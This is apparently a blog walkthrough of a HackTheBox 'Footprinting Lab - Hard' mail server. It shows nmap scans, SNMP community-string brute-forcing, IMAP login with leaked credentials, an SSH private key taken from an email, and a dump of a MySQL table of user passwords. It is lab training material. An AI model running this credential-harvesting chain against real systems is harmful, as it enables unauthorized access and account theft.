Footprinting Lab - Hard
The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.
So it looks like its going to be a mailing server that also functions as a backup server. Let’s start with a port scan. I like to start with a quick scan for open ports, and then service and script enumeration on each port. This saves us a lot of time.
$ nmap 10.129.73.237
Starting Nmap 7.80 ( https://nmap.org ) at 2024-12-09 18:43 EST
Nmap scan report for 10.129.73.237
Host is up (0.054s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
Nmap done: 1 IP address (1 host up) scanned in 4.95 seconds
$ nmap -p22,110,143,993,995 -sC -sV 10.129.73.237
Starting Nmap 7.80 ( https://nmap.org ) at 2024-12-09 18:44 EST
Nmap scan report for 10.129.73.237
Host is up (0.061s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL STLS TOP SASL(PLAIN) RESP-CODES CAPA AUTH-RESP-CODE USER PIPELINING
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login IDLE listed LITERAL+ STARTTLS more SASL-IR have LOGIN-REFERRALS capabilities Pre-login AUTH=PLAINA0001 OK ID ENABLE IMAP4rev1
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login IDLE listed LITERAL+ more SASL-IR have LOGIN-REFERRALS capabilities Pre-login AUTH=PLAINA0001 OK ID ENABLE IMAP4rev1
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA SASL(PLAIN) RESP-CODES UIDL AUTH-RESP-CODE USER PIPELINING
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.18 seconds
Definitely an email server! We have IMAP and POP3 running on Ubuntu. We also have SSH that we might be able to use if we find credentials. Let’s try and connect and see what we have to work with.
$ telnet 10.129.73.237 143
Trying 10.129.73.237...
Connected to 10.129.73.237.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.
$ telnet 10.129.73.237 110
Trying 10.129.73.237...
Connected to 10.129.73.237.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
We don’t have anything to login with so not much we can do there. After some more basic enumeration on these ports I was not able to find anything. So, back to square one. Let’s re-try scanning our machine with nmap. One thing I overlooked was UDP ports. The default nmap scan only scans TCP.
Completed UDP Scan at 19:18, 1182.42s elapsed (1000 total ports)
Nmap scan report for 10.129.73.237
Host is up, received reset ttl 63 (0.13s latency).
Scanned at 2024-12-09 18:58:43 EST for 1183s
Not shown: 997 closed ports
Reason: 997 port-unreaches
PORT STATE SERVICE REASON
68/udp open|filtered dhcpc no-response
161/udp open snmp udp-response ttl 63
49306/udp open|filtered unknown no-response
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1182.75 seconds
Raw packets sent: 1302 (38.383KB) | Rcvd: 1131 (64.984KB)
Completed NSE at 19:21, 0.01s elapsed
Nmap scan report for 10.129.73.237
Host is up, received reset ttl 63 (0.84s latency).
Scanned at 2024-12-09 19:19:27 EST for 149s
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
161/udp open snmp udp-response ttl 63 net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5b99e75a10288b6100000000
| snmpEngineBoots: 11
|_ snmpEngineTime: 40m02s
49306/udp closed unknown port-unreach ttl 63
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.14 seconds
Raw packets sent: 8 (324B) | Rcvd: 3 (235B)
Yep! Looks like we have SNMP 161 running. This is what we missed. SNMP stands for Simple Network Management Protocol. It is created to monitor network devices. SNMP uses what’s called a community string that acts as a password to query system information. We can use a tool called onesixtyone (for the port 161) to try and bruteforce this community string.
$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.73.237
Scanning 1 hosts, 3219 communities
10.129.73.237 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
Nice! We were able to bruteforce it and find the community string of backup. We can use snmpwalk to interact with the service.
$snmpwalk -c backup -v2c 10.129.73.237
iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (541232) 1:30:12.32
iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (33) 0:00:00.33
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (32) 0:00:00.32
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (33) 0:00:00.33
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (33) 0:00:00.33
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (542315) 1:30:23.15
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 0C 0A 13 2A 1E 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-90-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro ipv6.disable=1 maybe-ubiquity
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 141
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)
Now that’s a lot of information! Going through it slowly there is one line that sticks out to me.
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
These could be some possible login credentials! Let’ try to log into SSH!
$ ssh tom@10.129.73.237
tom@10.129.73.237 : Permission denied (publickey).
Rats. Well, that didn’t work. It appears the SSH server is configured to only disallow password authentication. This is a security standard. Let’s try logging into the IMAP service instead.
$ nc -nv 10.129.73.237 143
(UNKNOWN) [10.129.73.237 ] 143 (imap2) open
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.
tag login tom NMds732Js2761
tag OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
Logged in! Now let’s try and dig around and find some emails. First we can find our inbox.
tag list "" *
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX
tag OK List completed (0.011 + 0.000 + 0.010 secs).
We can now try and list the emails inside.
tag select INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
tag OK [READ-WRITE] Select completed (0.005 + 0.000 + 0.004 secs).
The line * 1 EXISTS tells us that we have one email in our inbox.
tag fetch 1 (BODY[])
* 1 FETCH (BODY[] {3661}
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
)
Nice. it looks like an admin sent an SSH private key to our user tom! Let’s try and login. We can copy and paste the key starting from the BEGIN OPENSSH line to the END OPENSSH line into a file on our locala machine. Then we need to change the file permissions so only we can read it so SSH accepts it.
$ vim id_rsa
$ chmod 600 id_rsa
Now let’s login!
$ ssh tom@10.129.73.237 -i id_rsa
The authenticity of host '10.129.73.237 (10.129.73.237 )' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.73.237' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 05 Feb 2025 06:55:22 PM UTC
System load: 0.0 Processes: 170
Usage of /: 70.0% of 5.40GB Users logged in: 1
Memory usage: 30% IPv4 address for ens192: 10.129.202.20
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Feb 5 18:55:07 2025 from 10.10.14.246
tom@NIXHARD:~$
We’re in! Now to try and find the credentials to our HTB entry in the database. I searched the running processes to determine what database was running which I assumed was going to be sql.
tom@NIXHARD:~$ ps aux | grep sql
mysql 941 0.2 18.7 1749728 382572 ? Ssl 18:21 0:06 /usr/sbin/mysqld
tom 2461 0.0 0.0 6432 740 pts/1 S+ 18:56 0:00 grep --color=auto sql
Looks like MySQL. Let’s see if our user has access to the database.
tom@NIXHARD:/home/ubuntu$ mysql -h 127.0.0.1 -u tom -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Looks like it worked! Now to enumerate for some juicy data.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.01 sec)
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.01 sec)
mysql>
Awesome! I think we’re almost there. Let’s search this users table in the users database.
mysql> select * from users;
+------+-------------------+------------------------------+
| id | username | password |
+------+-------------------+------------------------------+
| 1 | ppavlata0 | 6znAfvTbB2 |
| 2 | ktofanini1 | TP2NxFD62e |
| 3 | rallwell2 | t1t7WaqvEfv |
| 4 | efernier3 | ZRYOBO9PI |
| 5 | fpoon4 | 5Spyx2Jb |
| 6 | jgurnell5 | LMCnWKD |
<...output omitted...>
| 196 | jparkhouse5f | HCEchNzf |
| 197 | smcgunley5g | 9ivT96O |
| 198 | ssoal5h | qi6WX7TGIA |
| 199 | npeak5i | 3gR7Iuc0 |
| 200 | mleidl5j | qwfjY9RGk6 |
+------+-------------------+------------------------------+
200 rows in set (0.01 sec)
mysql>
Okay so it looks like we have a very big table with username and password columns. We could search through this manually. However we are hackers, so we’re gonna do it the (zero) cool way.
mysql> select * from users where username = 'HTB';
+------+----------+------------------------------+
| id | username | password |
+------+----------+------------------------------+
| 150 | HTB | <REDACTED> |
+------+----------+------------------------------+
1 row in set (0.00 sec)
And with that, this box is solved! We were able to thoroughly enumerate the machine to find the SNMP service and brute force it’s community string to find a username and password from the system information. We were then able to use that login to access the IMAP service and read an email that contained an SSH private key. We were able to login to SSH with the private key and enumerate the MySQL databse for our HTB credentials.
© 2025
•
Theme Moonwalk